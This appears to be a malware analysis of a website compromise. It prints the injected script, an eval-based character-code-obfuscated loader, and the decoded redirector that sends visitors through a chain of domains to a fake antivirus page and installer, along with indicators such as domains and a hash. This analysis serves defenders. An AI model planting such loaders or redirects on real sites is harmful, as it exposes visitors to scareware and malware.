The content injected into the compromised website:
<!-- Injected into the compromised page: loads the external, self-decoding
     loader (vub.js, shown below). The typographic quotes in both tags are a
     page-rendering artifact; the sample uses ordinary straight quotes. -->
<script src=”vub.js”></script>
<!-- Calls the function that vub.js defines once it has decoded itself. The
     argument ends up appended, unencoded, to the q= parameter of the first
     redirect hop (see the decoded routine further down). -->
<script>hoeyemcs(‘Mnworkforce+Center’);</script>
Contents of vub.js:
// vub.js is a self-decoding loader: every element of `str` is a character code
// shifted by a fixed constant. The loop below recovers the plaintext script and
// hands it to eval(). For triage, decode it offline (subtract 876, map each
// value through String.fromCharCode) instead of executing it; doing so yields
// exactly the routine shown further down on this page.
var str=["889", "886", "885", "885", "885", "994", "973", "990", "908", "988", "987", "994", "937", "924", "935", "889", "886", "885", "885", "885", "978", "993", "986", "975", "992", "981", "987", "986", "908", "980", "987", "977", "997", "977", "985", "975", "991", "916", "989", "993", "977", "990", "997", "917", "999", "889", "886", "885", "885", "885", "885", "995", "981", "986", "976", "987", "995", "922", "984", "987", "975", "973", "992", "981", "987", "986", "937", "915", "980", "992", "992", "988", "934", "923", "923", "931", "928", "922", "932", "930", "922", "925", "928", "928", "922", "925", "931", "932", "923", "993", "990", "984", "923", "979", "987", "922", "988", "980", "988", "939", "991", "981", "976", "937", "925", "929", "914", "989", "937", "915", "908", "919", "908", "989", "993", "977", "990", "997", "908", "919", "908", "915", "915", "935", "889", "886", "885", "885", "885", "1001"];
// NOTE: the two empty-string literals ('') below were rendered as a single
// typographic quote by the page; the sample itself uses ordinary empty strings.
var temp=”;
var gg=”;
// `i` is never declared with var, so it leaks as a global. Sloppy but typical of
// generator-produced obfuscation, and a small hint when sorting out such samples.
for (i=0; i<str.length; i++){
gg=str[i]-876;                       // remove the fixed offset: "889" - 876 = 13 (CR), "994" - 876 = 118 ('v'), ...
temp=temp+String.fromCharCode(gg);   // rebuild the plaintext one character at a time
}
// Numeric array + fromCharCode loop + eval() of the result is a classic
// obfuscation signature worth alerting on; eval() is where the real payload runs.
eval(temp);
When the JavaScript routine is decoded and run, it looks like this:
// Declared but never used by the routine shown here; presumably leftover from
// the generator or used by code not included on this page — verify before relying on it.
var pov=0;
// Redirector entry point called from the injected page. It navigates the
// browser to the first hop of the redirect chain (go.php on a bare IP, no
// hostname), appending the caller-supplied `query` to the q= parameter
// without any encoding.
function hoeyemcs(query){
// Assigning window.location forces an immediate top-level navigation. The
// trailing `+ ”` is a concatenation with an empty string ('') whose quotes
// were mangled by the page's rendering.
window.location=’http://74.86.144.178/url/go.php?sid=15&q=’ + query + ”;
}
This causes multiple redirections through several domains and ultimately lands on the fake scanning page.
hxxp://74.86.144.178/url/go.php?sid=15&q=
Redirects to
hxxp://dadquox.cn/?wm=70126&q=
Redirects to
hxxp://atuyfe.cn/?wm=70126
Whois entry for atuyfe.cn (195.95.151.174):
ROID: 20081230s10001s20184853-cn
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.pubilcnameserver7.com
Name Server:ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 10:00
Expiration Date: 2009-12-30 10:00
AS40965
EASTNET-UA-AS
acajelu.cn
adayby.cn
adiuqga.cn
ajowah.cn
ajuadeb.cn
akaysu.cn
akipahu.cn
amayrex.cn
amocyux.cn
anamuco.cn
aniuha.cn
ateudny.cn
atiqad.cn
atoacu.cn
atuyfe.cn
countedantiviruspro.com
exeype.cn
ezeunac.cn
ferojaw.cn
fevopru.cn
fexonhu.cn
fidteur.cn
getavplusnow.com
gihugyx.cn
giwgeam.cn
gojaxty.cn
megaantivirusplus.com
nextantivirusplus.com
suxpymi.cn
www.acyikap.cn
www.adiuqga.cn
www.adocyha.cn
www.ajuadeb.cn
www.akaysu.cn
www.anoemyx.cn
www.antivirusplus-ok.com
www.ateudny.cn
www.atoacu.cn
www.exeype.cn
www.fevopru.cn
www.fidteur.cn
installer_70126.exe
Result: 19/41 (46.35%)
MD5: aaead5bc5202b75c8e1553ede907084a
VirusTotal
ThreatExpert Analysis
hxxp://atuyfe.cn/installer_70126.exe
